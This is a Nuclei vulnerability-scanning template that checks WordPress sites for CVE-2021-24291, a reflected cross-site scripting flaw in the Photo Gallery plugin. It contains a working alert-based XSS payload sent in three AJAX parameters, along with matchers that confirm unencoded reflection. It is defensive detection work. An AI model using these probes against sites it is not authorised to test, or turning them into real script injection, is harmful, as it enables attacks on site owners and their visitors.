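---
# Nuclei template: checks a WordPress site for the reflected XSS tracked as
# CVE-2021-24291 in the Photo Gallery plugin. It sends GET requests to the
# bwg_frontend_data AJAX action and reports a match only when the probe
# marker comes back unencoded in an HTML response.
id: CVE-2021-24291

info:
  name: 'Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)'
  author: geeknik
  description: >-
    The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues
    via the gallery_id, tag, album_id and theme_id GET parameters passed to
    the bwg_frontend_data AJAX action (available to both unauthenticated and
    authenticated users)
  reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a
  severity: medium
  tags: 'cve,cve2021,10web,xss'

requests:
  - method: GET
    # One request per parameter: tag, theme_id and gallery_id.
    # NOTE(review): the description also lists album_id, which has no request
    # here, so a "no match" result says nothing about that parameter.
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&tag=%22%20onmouseover=alert(1)%3E"
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&theme_id=%22%20onmouseover=alert(1)%3E"
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_id=1%22%20onmouseover=alert(1)%3E"

    # All three matchers must hold for a request to count as a finding.
    matchers-condition: and
    matchers:
      # The AJAX endpoint answered normally.
      - type: status
        status:
          - 200

      # The response is served as HTML, so reflected markup would be rendered
      # by a browser; this filters out non-HTML responses that merely echo
      # the input.
      - type: word
        part: header
        words:
          - "text/html"

      # The marker is present with its double quote and ">" intact, i.e. the
      # value was reflected without HTML encoding. The part is stated
      # explicitly (body is the word matcher's default) so the intent is
      # visible next to the header matcher above.
      # Triage: a match shows unencoded reflection only. Confirm the installed
      # plugin version; the template name implies 1.5.69 carries the fix.
      - type: word
        part: body
        words:
          - "\" onmouseover=alert(1)>"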